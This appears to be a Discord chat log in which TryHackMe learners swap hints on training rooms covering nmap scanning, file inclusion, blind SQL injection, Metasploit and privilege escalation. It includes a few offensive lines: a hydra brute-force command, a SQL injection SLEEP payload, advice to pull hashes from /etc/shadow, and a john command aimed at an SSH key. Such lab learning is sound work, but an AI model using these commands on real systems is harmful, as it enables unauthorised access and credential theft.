Yep. And this is different. Read through the content in the room.

It's best not to assume what you're meant to do

need help https://i.imgur.com/psu6zpK.png

did so much research on google about this

" Known by many names, SYN-scanning, or Half Open scanning is where the full TCP connection is never made. SYN-scanning sends the first packet only, the one marked with the SYN flag. It waits for either a RST, ACK or SYN,ACK response. "

none of these options work

the answer format is too long for any of these to work

what could I be missing this time ?

nvm im connected

sorry

think both are named in the text of that section of that room

the answer format is so weird

one is a very old name

have you checked the man page?

also read the task

it can help if you say which room it is 🙂

furthernmap

SYN scans can also be made to work by giving Nmap the CAP_NET_RAW, CAP_NET_ADMIN and CAP_NET_BIND_SERVICE capabilities; however, this may not allow many of the NSE scripts to run properly.

One of the answers is stealth scan iirc

" syn scans can also be made to work "

you are correct

is this a reference to being other name for syn scan

the question is really hard

its just a puzzle at this point

read the text in the task, it's an easy question

It's really not

look at the answer format

it has a " , "

in middle

like what

yeah

indicating that it wants two answers

answer1, answer2

Except no spaces

works with a space

the other one is half open scan ?

that's the first, yes

half-open... no space

honestly, read through the text that is there, you'll have it in no time

yeah the question was harder than the answer it self

got it now

good job getting it now

took only like 50 minutes

a lot of questions on THM are there to make sure you have read and understood the info above. if you're struggling, go back and at least skim read it

Some aren't immediately intuitive like privesc rooms

Hey all, looking for some assistance. I am in the "Content Discovery" room on task 3. I have identified the favicon, got the hash, and cross-referenced it to the OWASP database. There is only 1 match that is "Zero byte favicon". However that answer is to long. I have tried all 3 words individually, with no luck. I ran the process again came up with the same result, and am stuck as I can not determine the stack framework. Any thoughts?

so im doin the metasploit room rn but whenever i try to send it over it always ending up taking a long time or saying no session was created

i do use another vpn whenever i use my vm but i doubt its the prob

but yall are smart so

I did this room if this doesn't match u can reboot the target and then begin back... When it does the same the second time u must insist u can still add LHOST after RHOST if u didn't the first time

can anyone give a hint regarding the task 8,question 3 of https://tryhackme.com/room/fileinc ?

Sure 🙂
Request-Type/Cookie

Hey guys! I'm somewhat stuck on the new IDE room. I've used an exploit to get a shell. So far so good. From a certain file I know that there's an image that might contain helpful information. I know where the user flag is but I cannot access it as I don't have the privileges. Any hints on what I should look out for?

A lot of people got stuck. Me included..
Also a lot of people got help there 🙂 #898631531910803527

Sometimes my eyes refuse to read what's right in front of me. Thank you mate!

Gave +1 Rep to @prime willow

I had that the last 3 days lol, I know how that feels lololol

huge thank you, i didnt even think about that. i was stuck in different types of URL encodings, then i was thinking that maybe its something related to the / added after each quiry i tried to add cause it looked suspicious xd

Gave +1 Rep to @prime willow

yea i got everything set up i did the options command everything should be in order but it can never establish a connection whenever i run it

it starts the reverse tcp handler then sends it, then theres just no response

Good morning/afternoon/evening! Got a query about the KotH Hogwarts room. I am struggling the figure out the 7th (final?) flag. I found three deathly hallow clues ||(search file content for Invisibilty cloak:, Elder wand:, and Ressurection stone:)||, which I guess combine to the final flag. Anyone any thoughts/suggestions?

don't think we usually offer help on active KOTH rooms

what am i Missing any clues ?

what's the Windows anonymous user?

Hello! i'm learning about regular expressions and am stuck on Charsets. When excluding a number does the ^ go into the same charset as the group of files?

no idea

might be a googlable question, eh?

https://serverfault.com/questions/51635/how-can-an-unauthenticated-user-access-a-windows-share

found this

for example

ill look right into it

Guest ?

omg y did i speak so dumb.. it must be Guest. right ?

but doesnt it ask me to use "Anonymous"

it does-

ion really remember that room too well but pretty sure the name "anonymous" is like a whole role in it self

like administrator blah blah

Hi. Not an active KotH room, just food for thought 🙂

yeah but it's SMB, so the username is different because reasons

any hints on the IDE room? Tried working out with the unauthenticated public exploit without success. should there be anything on that ftp?

#898631531910803527

I am on WebAppSec101 Room, Task 4, Question 4 What is the username of a logged on user?. The Hint suggested is to use Daniel Miessler's names.txt list to bruteforce the usename. There isn't any hint on what tools to use, so I tried using hydra and with this command: sudo hydra -l admin -P /home/kali/wordlists/names.txt IP http-post-form "admin/index/index.php?page=login:adminname=^USER^&password=^PASS^" to no avail. Anyone know what tool to use for this? i also thought about enum4linux but there is no smb

Have not complete the room yet nor familiar enough with hydra, but you use -P for password with wordlist, the wordlist you give is a names.txt for username. switch it with -l to -L /home/kali/wordlists/names.txt

Shoooooooot

you right let me see if works

you have the password?

So apparently it's admin admin to log in

but the question is asking for what the username is ?

i thought it was admin but it's not

shit dude

wrong post

my bad

glhf

hi iam stuck in n map live host discovery, in TASK 7

did you check the crontabs?

me?

no

Da

oh hey, How I can help yoo

Hi iam stuck in nmap live host discovery room TASK 7

man im stuck at Privesc

which room

I didnt yet that room mate

IDE

ohhh np

Yes, this is why I said crontabs

or the permissions of some bins

hey how can i get the roles

yes im just going through them!

first u need to verify ur acc

type !verify in the thm bot with your token

Yes iam verified

wait, but my token ??

u will know!

da

it is in your profile

while joining the server i used thats it now

ohhh

r u from bangalore?

Wut, no bro haha

ur da made me think of that

yo iam verified

kinda

hahaha lets get a koth and you will know where Im at

Da is for the Russian yes

later!

you are from hyderabad right

dayum!

Hard dox xD

??

yes

coool

Linkedin?

yeah

gg

dont attach like that

@indigo ledge have u done nmap live host discovery room?

no mate

i will do that next for sure

ohh, how are u playing VM ware

what u will do in that

#general this channel is for hints only

Holy chips bro, you are lucky range

only 3 people have it now

Why like taht

that*

Its for an event, but it ends...
I've actually wanna get this role

now what s special about this role

Da

DaDa

Could anyone give a hint for 'Task 8: Blind SQLi - Time Based' of SQL Injection room: https://tryhackme.com/room/sqlinjectionlm -> I have the table schema ||sqli_four ||, but the table name just doesn't seem to come correct. Currently, it is at ||analytics-referrer-% (assume - to be _ )||, I even tried || like 'analytics-referrer-' it works. But when I use = 'analytics-referrer-' it doesn't||
I seem to have tried every alphanumeric character, yet nothing comes to be correct.

Take a look at the syntax in task 7. Practically the only difference is the left part: referrer=admin123' UNION SELECT SLEEP(5),2
Everything else is exactly like in task 7 🙂

I think that the table named probably are different?

||nope||

thanks I fell into a rabbit hole and went onwards to trying everything on a new/different table in that database

Gave +1 Rep to @prime willow

Hi, guys. I'm stuck on a question on Network Services under the Complete Beginner path. Enumerating Telnet, question 6 to be exact. "
Based on the title returned to us, what do we think this port could be used for?" I've been entering flags to get more info on the port but to no avail. What should I be looking for when sifting through the nmap docs?

What flags are you using?

I tried sV, sC, A, sS, O and a couple others

A should give it to you

Normally it is X 😂 :
https://www.youtube.com/watch?v=fGx6K90TmCI

@prime willow lol

I'll keep digging, thanks guys

Could someone give me a hint with python for cyber security please ? I'm stuck on the question "What is the function used to connect to the target website? "

When looking around online the most common functions used to connect to a website are ||requests.get|| and ||urllib.parse|| or ||urllib.request||. What other ones are there ?

Never mind. I realised I needed to include () in my answer

Could anyone pass me a hint on enumeration of the Enterprize box?
Subdomain fuzzing, nmap, and gobuster only yield the /var and /public directory, without me being able to find any further files.
Only port 22 and 80 seem open, although nmap is taking forever to complete the scan.

I'm doing some old rooms https://tryhackme.com/room/hackback2019 (task 13) and I kinda need a hand

Did you find a subdomain?

has any one finished holo? i'm stuck on the first privesc

Dm me if you need help

Hi everyone. New to THM.
I'm working through Task 4 - Exploiting SMB
question: "...Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]"...
I don't see scp, but do see scopy. I can't figure out how to use scopy to get the id_rsa file off the target server to my local (attackbox) machine so I assume scopy isn't what I should be using. Can someone help point me at which tool I should use? (T.I.A!)

Can you show me the room?

You should be able to download the file using the get command

I didn't, no.
I'll try that again with a bigger list.

Didn't do the trick.

In the buffer overflow prep room, for overflow2 , my offset is coming ||633|| but seems the answer is ||634||. Is the problem same with everyone, or is it just me?

#898631531910803527

Scroll up there, you may find the hint you need

subdomains-top1million-110000.txt

Thanks for this!

Gave +1 Rep to @prime willow

NetworkServices Task-6 Q1 just we need to scan like this ryt?
nmap <ip>

Any hints for the new IDE room by Bluestorm and 403Exploit? I got a file on the anonymous ftp and found how to read it but I don';t understand what the password is and where i'm supposed to use it

If you can't find the port, you might want to scan all ports, as nmap by default only scans the most common 1000 ports. So you would have to add -p- to your command in order to go for all ports.

ok i will try that

Maybe also add -T4 so it will be a bit faster, as it could take some time to scan all ports.

go to #898631531910803527 you should find more information there, maybe someone already asked about it and i also believe more people check that room than here

👍

also be careful about your enumeration, you are missing something i believe, there is more than the ftp server

got it. Thanks!

Gave +1 Rep to @native atlas

In the buffer overflow prep room, for overflow2 , my offset is coming ||633|| but seems the answer is ||634||. Is the problem same with everyone, or is it just me?

Hello i cant find right answer for Priv Escalation (linux ) Task 10 Q:1. I done all other questions but i cant find only this one . When i run echo $PATH there is nothing that fit as answer. Where i am going wrong ? Any hints ? Thank you in advance.

Could you post the room link? As the Priv Esc room I found in task 10 has nothing to do with what you explain here

@left thunder Yes , sure . https://tryhackme.com/room/linprivesc

this is the question " What is the odd path in PATH? "

Mh, honestly I don't know any hint or answer to that :/

Can be room bug this ?

Maybe, someone had the same issue and already wrote in #room-bugs it's on of the latest comments

Oo yes i saw it now. Thank you for the help

Any luck on this?

No still does not work. Nothing from the command works

Hey there! Would anyone have a hint for room oscommandinjection:
What popular network tool would I use to test for blind command injection on a Linux machine?

I've been trying all tools I could think of (I must not know of it).
Even tried looking it up but most searches ended up with Commix (also tried searching for Commix alternatives to no avail).

EDIT Got it.

Been trying to do https://tryhackme.com/room/fileinc Task 8, question 3. Pretty lost. I can't seem to figure out how to bypass the filtering

You can find the answer somewhere in the attached image.
If you want a bigger hint:
||Look at the first point||

Yeah, that's what I've been playing with. ||Cookies and HTTP Headers|| and not making any headway, sadly

||That's not it||

Hmm, okay thanks.

Alright, Been trying for about another hour and still no luck on this. Now I'm trying to ||POST the request, but can't seem to use %00 to null the .php||, am I barking up the wrong tree again?

Hmm, that's worked for me. I used ||cURL||

I had some initial issues with this one. Just follow the inspect element -> change stuff steps like in the previous tasks then this should work. When I used something like Burp for some reason I could not get it to work.

Hmm... yeah I went to ||curl|| and got it to work. couldn't get it to work in ||browser or burp||. Thanks for the tips.

Sad to say I'm having a bit of trouble with File Inclusion Challenge 3

Nevermind, found the solution

yeah, I'm just stuck on nulling the php. can't seem to make it work any which way i try it

aaaaahhhh I GOT IT

I was doing jr pen test stuck at lfi flag3 which doesn't accept any special char or number
A small hint please thanks

read the convo just above

it really puts you on track

Hello I'm doing the Network services part 2 room and I'm not sure which nmap flag i'm suppoed to use to find the open port

the question indicates there is 1 port open

I tried -sV and -sT

Have you tried -p- for all port?

nope

thank you

:))

I'll try that

Any nudge on lfi chall3, pls? I read the convo above but still cant get it

look through curl --help and see the different ways to send a file

Do I have to upload a file?

no. just send a request for one

i chose my words xrong. Should have said integrate

Oh, ok, I'll try. Thanks!

Im just very dumb

Thank you, I got it!

Dunno why I didnt think of this in the first place

hello i have question iam unable to crack hash through john Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
the error i am getting is this Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
the command i used is john id_rsa --wordlist=/usr/share/wordlists/rockyou.txt

any hints for the linprivesc room task 9

could you post a screenshot of what you're doing please?

in order to post screenshots, you need to verify :P

!docs verify

Did you cracked this ssh key with ssh2john first?

I'm struck with that blind sql Question in room

I got database and by doing like like statements but then struck going next.
link-https://tryhackme.com/room/sqlinjectionlm
Room - SQL Injection
Task - 8

I tried everything and got to know the table name but what to do.

hello can any one help with "Walking an Application " Pen testing course having a problem with finding 2 questions. One being "
What is the flag from the HTML comment"

So did you went through the page source code?

yes i 've been looking at the first page source code. then i went to the other web site from the bottom of the page source code. but i cant seem to find the answers to 1,3 and 4. its been 2 days of me clicking and reading everything.

Well I have not done that room yet, but as it states it is a comment, you could for example right click and press view page source code and then search(CTRL+F) for <!-- as a comment in the page source will start with that.

yea i did that on both pages, im over looking both websites source code as we speak but there is only 1 comment at the top of the page and that's not the flag.

I just did that question. There is a comment on top of one of the pages source code that lead you to another page, where you will find the flag.

wow... smh... that simple. i was thinking it would be links you could click on like number 2. so one last question any hints on 3 and 4. and then i'm done for today. Please and thank you.

wow... smh... that simple. i was thinking it would be links you could click on like number 2. so one last question any hints on 3 and 4. and then i'm done for today. Please and thank you.

Gave +1 Rep to @left thunder

Well, you should maybe always go for the simple things first 😄

So for question 3. If for example you look at the page source from the home page. You can see some links to resources like jquery.min.js or site.js . These files are stored in a folder, so you might want to try if you can simply open that folder in your browser 🙂

i didnt get you in trouble did i. just seen something pop up saying "robocop gave plus1 rep to you"

Oh nono, that's actually good for me, as it gave me reputation 😄

This is asking about a title returned, but I don't see anything regarding a title.

Try to scan with the -sV or -A flag instead of -sT on that port (so no need to scan all ports again)

Does have to be a space between the flag and the port number?

No

Gets stuck at 0.00 percent with either of those options

Well I don't know why it's stuck, maybe restart the target machine or check if the target machine expired

ok

thanks i'll try that

got this returned

in the 3rd challenge of fileinc, i could actually make it bypass the filtering but it doesn't interpret the null terminator, don't know what to do

Alright, so that should give you the answer to your question 🙂

@left thunder ok i'll try to figure it out. it's just that the format in which the answer has to be is throwing me off

Well it's basically just like that "A banana" or A car" 😄

ok thank you for the help

Figured it out ❤️

What is meant with "What is the odd path in PATH?"?

in https://tryhackme.com/room/linprivesc

edit: got it, but it wasn't in path

@left thunder for task 3 question 3 walking an application. From what I can read I am supposed to open a directory in the web browser to find the flag.txt file. How do you go about opening the directory

Can i get a hint for Authentication Bypass task 4

I've read everything multiple times and done as it says, and been messing with the site to try get the support ticket

but either i cant find the link in the output, or I'm doing something incorrect

Well did you found the directory yet?

https://tryhackme.com/room/winprivesc

task 6 q3, can someone lend me a hint?

I don't know what that means yet. After talking with other users it has been suggested I finish some other learning paths to further my education first. Thank you for the hint

Gave +1 Rep to @left thunder

Hey guys is https://tryhackme.com/room/meterpreter supposed to be vulnerable to ||ms17_010||? Can't seem to get it to work.

Getting: Rex::Proto::SMB::Exceptions::LoginError: Login Failed: Connection reset by peer

Bump

You saw that there are creds you can use with exploit/windows/smb/psexec right?

oh?

ohhh....

uhhh.... that's an oversight on my part haha

https://i.imgur.com/lreY80C.png

I don't understand

Ye, happens 😄

it should be unquotedpathservice.exe right?

well... thanks even if I feel dumb there's at least a way forward haha

Gave +1 Rep to @left thunder

Nothing to feel dumb about, that happens to all of us 😄

Hey there

h

https://tryhackme.com/room/linprivesc

task 7 q2

--help

sec

try using john

extract hashes of /etc/shadow

I'm unable to understand how should i escalate

can't

??

no perms

less suid/

wait nvm

uhh

i didn't get u

wait

nvm

lemme boot up the machine

i can't find anything useful in the suid files

attackbox is almost upp

have you taken a look at SGIDs as well?

damn

jst a min

I described the 2nd stage of this privesc "accidentally", gl!

cool thanks!

well uhhh coming back with another request for a hint with the meterpreter room.
Task 5 Question 6

I found the answer but I can't input it

then it's not the answer™️

It is...

1000%

the next question asks the content of the file which I have correct

the sixth question asks for the path (and it wont accept the path I put in)